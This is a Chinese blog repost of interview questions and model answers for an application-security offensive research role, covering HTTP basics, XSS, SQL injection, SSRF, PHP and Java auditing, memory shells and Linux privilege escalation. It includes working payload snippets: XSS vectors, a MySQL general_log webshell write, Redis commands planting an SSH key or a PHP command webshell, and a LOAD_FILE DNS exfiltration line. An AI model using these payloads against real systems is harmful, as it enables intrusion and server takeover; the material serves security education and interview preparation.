当前位置: 首页 > news >正文

2025年渗透测试面试题总结-匿名[校招]攻防研究员(应用安全)(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 匿名[校招]攻防研究员(应用安全)

基础部分

1. HTTP状态码

2. HTTP请求方法及作用

3. 网络分层及协议

OWASP Top 10

1. XSS代码执行方式

2. XSS常用标签及绕过

3. HttpOnly的作用及绕过

4. 判断SQL注入存在

5. 无回显注入处理

6. MySQL延时注入其他姿势

7. DNSLog原理

8. 单引号被拦截绕过

9. MySQL写Shell的其他方式

10. Redis利用命令

11. SSRF利用

PHP安全

1. 审计流程

2. 命令执行函数

3. 文件上传函数

4. 代码执行函数

5. Vendor目录作用

6. PHPUnit漏洞

7. 无文件Shell实现

Java安全

1. 通用漏洞组合利用

2. 命令执行函数

3. 框架审计重点

4. 审计流程与关注点

5. Tomcat回显构造

6. 内存马实现

其他

1. POC/EXP开发心得

2. Linux提权姿势

3. 渗透关注文件

4. Dirty Cow时间及修复

5. 未提及的擅长点

 匿名[校招]攻防研究员(应用安全)

### 基础1. http状态码,502,503,501
2. http请求方式及各自作用
3. 计算机网络的分层及分别有哪些协议### **owasp top 10**1. xss如何执行代码
2. xss常用哪些标签
3. http only
4. 怎样判断是否存在注入
5. sql注入无回显怎么办
6. 延时注入除了sleep的其他姿势(mysql)
7. dnslog的实现原理
8. sql注入,单引号被拦截,如何绕过
9. sql注入,写shell的语句,除了into outfile还有什么mysql的特性可以getshell
10. redis的利用,如何shell,相关命令
11. ssrf的原理即后利用,怎么执行命令,常搭配使用的协议### PHP安全相关1. 审计流程
2. 命令执行函数
3. 文件上传函数
4. 代码执行函数
5. vender目录
6. phpunit
7. php可以构造无文件shell吗### **Java安全相关**1. 挖过的通用洞,你会怎么利用(组合)
2. 命令的函数或包
3. java哪些框架,审过哪些框架,它们常出现的问题是什么
4. 审计流程,你一般关注哪些洞,或擅长挖哪种类型
5. tomcat做回显
6. 内存马的实现### **其他**- 写poc/exp的经历和心得
- 复现的一些漏洞
- Linux 提权的姿势
- Linux下有哪些文件进行渗透时比较关注的,及文件权限问题
- dirty cow 的时间及其修复版本(哪年后就没法用了)
- 你觉得什么是你自己比较擅长的而我没有问到的. ### **小结**这个岗位主要是搞漏洞挖掘和利用以及原理分析,Web方面就是JAVA和PHP的安全研究,比如JAVA下的流行框架,组件和服务器应用的安全问题。 没有问内网!!!

基础部分


1. HTTP状态码
  • 502(Bad Gateway):代理服务器从上游服务器接收到无效响应。常见于反向代理配置问题。
  • 503(Service Unavailable):服务器暂时无法处理请求,通常因维护或过载。
  • 501(Not Implemented):服务器不支持请求方法(如使用非标准的HTTP方法)。
2. HTTP请求方法及作用
  • GET:获取资源(无副作用)。
  • POST:提交数据(如表单)。
  • PUT:替换目标资源。
  • DELETE:删除资源。
  • HEAD:获取资源的元信息(不返回Body)。
  • OPTIONS:查询服务器支持的请求方法。
3. 网络分层及协议
  • 应用层:HTTP、FTP、DNS、SMTP。
  • 传输层:TCP(可靠传输)、UDP(低延迟)。
  • 网络层:IP、ICMP、ARP。
  • 数据链路层:Ethernet、PPP。
  • 物理层:物理介质规范。

OWASP Top 10


1. XSS代码执行方式
  • 反射型:攻击载荷通过URL参数注入并反射到页面执行。
  • 存储型:恶意脚本存储到数据库(如评论字段),用户访问时触发。
  • DOM型:由前端JavaScript操作DOM时触发(无需服务端参与)。
2. XSS常用标签及绕过
  • 经典标签<script>, <img src=1 onerror=alert(1)>, <svg/onload=...>
  • 事件属性onmouseover, onload, onerror
  • 编码绕过:Hex/Unicode编码(如javascript:alert(1)\x6A\x61...)。
3. HttpOnly的作用及绕过
  • 作用:防止JavaScript读取Cookie(缓解XSS窃取会话)。
  • 绕过:通过其他漏洞(如浏览器缓存劫持、中间人攻击)获取Cookie。
4. 判断SQL注入存在
  • 报错型:输入单引号触发数据库错误(如'You have an error...)。
  • 布尔盲注:构造AND 1=1AND 1=2观察页面差异。
  • 时间盲注:通过SLEEP()判断响应延迟。
5. 无回显注入处理
  • 外带数据:利用DNSLog或HTTP请求外传数据(如LOAD_FILE('\\\\xxx.dnslog.cn\\test') )。
  • 盲注攻击:布尔或时间盲注逐位提取数据。
6. MySQL延时注入其他姿势
  • Benchmark函数BENCHMARK(1000000, MD5('test'))
  • 条件运算IF(1=1, SLEEP(5), 0)
7. DNSLog原理
  • 实现:攻击者控制域名服务器,触发目标解析特定子域名(如payload.attacker.com ),通过DNS查询日志获取注入结果。
8. 单引号被拦截绕过
  • 宽字节注入:利用GBK编码转换(如%df%27 → 吞掉转义符)。
  • 数字型注入:无需引号的注入点(如id=1 AND 1=1)。
9. MySQL写Shell的其他方式
  • 日志文件写入
    sqlSET global general_log = 'ON'; SET global general_log_file = '/var/www/html/shell.php'; SELECT '<?php @eval($_POST[1]);?>'; 
  • 全局变量:利用secure_file_priv为空时直接写文件。
10. Redis利用命令
  • 写SSH密钥
    bashconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save 
  • 写Webshell
    bashconfig set dir /var/www/html set x "<?php system($_GET['cmd']);?>" save 
11. SSRF利用
  • 原理:服务端发起任意HTTP请求,攻击内网或本机服务。
  • 协议利用
    • File协议:读取本地文件(file:///etc/passwd)。
    • Gopher:构造TCP流量攻击内网Redis/MySQL。
  • 命令执行:结合CRLF注入或协议特性(如Redis的eval命令)。

PHP安全


1. 审计流程
  1. 入口点分析:定位用户输入($_GET$_POST)。
  2. 危险函数跟踪:如evalsystemunserialize
  3. 参数传递路径:追踪变量是否未过滤直接进入敏感函数。
2. 命令执行函数
  • 高危函数systemexecpassthrushell_exec、反引号(`)。
  • 间接执行popenproc_open
3. 文件上传函数
  • 核心函数move_uploaded_file(结合is_uploaded_file验证)。
  • 漏洞场景:未校验后缀/MIME类型,或黑名单不全(如.phar绕过)。
4. 代码执行函数
  • 动态执行evalassertcreate_function
  • 回调函数array_mapcall_user_func
5. Vendor目录作用
  • 用途:存放Composer依赖包,可能包含漏洞组件(如未更新的guzzlehttp)。
6. PHPUnit漏洞
  • 历史漏洞:CVE-2017-9841(远程代码执行,因eval-stdin.php 未删除)。
7. 无文件Shell实现
  • 内存驻留:通过反序列化漏洞加载恶意类(需unserialize可控)。
  • 伪协议:利用php://input执行代码(需allow_url_include=On)。

Java安全


1. 通用漏洞组合利用
  • 框架漏洞:Struts2 OGNL注入 + Fastjson反序列化。
  • 组件链:利用commons-collections链触发RCE。
2. 命令执行函数
  • 核心类Runtime.getRuntime().exec()ProcessBuilder
  • 反射调用:通过反射绕过黑名单检测。
3. 框架审计重点
  • Spring:SPEL表达式注入(CVE-2022-22963)、未授权端点。
  • Hibernate:HQL注入(非预编译查询)。
  • Fastjson:反序列化漏洞(利用AutoType特性)。
4. 审计流程与关注点
  • 入口点:HTTP请求处理、RPC接口、JSON/XML解析。
  • 擅长方向:反序列化链构造、表达式注入、权限绕过逻辑。
5. Tomcat回显构造
  • 线程注入:通过反射获取Response对象(如从ThreadLocal提取)。
  • 内存马适配:注入Filter或Servlet动态注册恶意逻辑。
6. 内存马实现
  • Filter型:插入恶意Filter到责任链头部。
  • Agent型:动态修改字节码(如利用javassist)。

其他


1. POC/EXP开发心得
  • 关键点:漏洞触发条件精准复现、兼容性处理(如版本差异)。
  • 案例:Fastjson反序列化EXP需构造特定Gadget链。
2. Linux提权姿势
  • 内核漏洞:Dirty Cow(CVE-2016-5195)、sudo权限滥用(CVE-2021-3156)。
  • SUID滥用:find、vim等可执行文件提权。
3. 渗透关注文件
  • 敏感文件/etc/passwd/etc/shadow、SSH密钥(~/.ssh/id_rsa)。
  • 权限问题:全局可写文件(find / -perm -o=w)。
4. Dirty Cow时间及修复
  • 时间:2016年10月披露,影响Linux内核≤4.8.3。
  • 修复版本:4.8.3以上内核已修补。
5. 未提及的擅长点
  • 反序列化漏洞链分析:Java/PHP反序列化利用链构造与调试。
  • 框架组件0day挖掘:基于源码分析或黑盒Fuzz。
http://www.xdnf.cn/news/725581.html

相关文章:

  • 【解决办法】Git报错error: src refspec main does not match any.
  • 使用 SymPy 操作三维向量的反对称矩阵
  • STL解析——vector的使用及模拟实现
  • 缺页中断(Page Fault)详解
  • Marshalling与Demarshalling深度解析
  • PyTorch学习(1):张量(Tensor)核心操作详解
  • Trust Tickets(跨域信任票据):内网渗透中的Kerberos信任票据滥用技术
  • MacOs 安装局域网 gitlab 记录
  • VSCode无法转到定义python源码(ctrl加单击不跳转)
  • React 项目中封装 Excel 导入导出组件:技术分享与实践
  • TF 卡 U1 与 U3 的核心差异解析:从速度标准到应用场景
  • 单细胞注释前沿:CASSIA——无参考、可解释、自动化细胞注释的大语言模型
  • docker笔记
  • AI对软件工程的影响及未来发展路径分析报告
  • AI与软件工程结合的未来三年发展路径分析
  • MySQL数据归档利器:pt-archiver原理剖析与实战指南
  • Hive的JOIN操作如何优化?
  • 针对Helsinki-NLP/opus-mt-zh-en模型进行双向互翻的微调
  • 解决 maven编译项目-Fatal error compiling: 无效的目标发行版: 21 -> [Help 1]
  • 1.3HarmonyOS NEXT统一开发范式与跨端适配:开启高效跨设备应用开发新时代
  • 【TTS】基于GRPO的流匹配文本到语音改进:F5R-TTS
  • 搭建最新版开源监控平台SigNoz踩的坑
  • 从收货到上架,海外仓系统如何智能优化入库管理?
  • Vue3中自定义指令
  • React项目在ios和安卓端要做一个渐变色背景,用css不支持,可使用react-native-linear-gradient
  • Syslog 全面介绍及在 C 语言中的应用
  • 第J2周:ResNet50V2算法实战与解析
  • 第二章支线二:浮空之域:布局法则深研
  • 003图书个性化推荐系统技术剖析:打造智能借阅新体验
  • 动态规划基础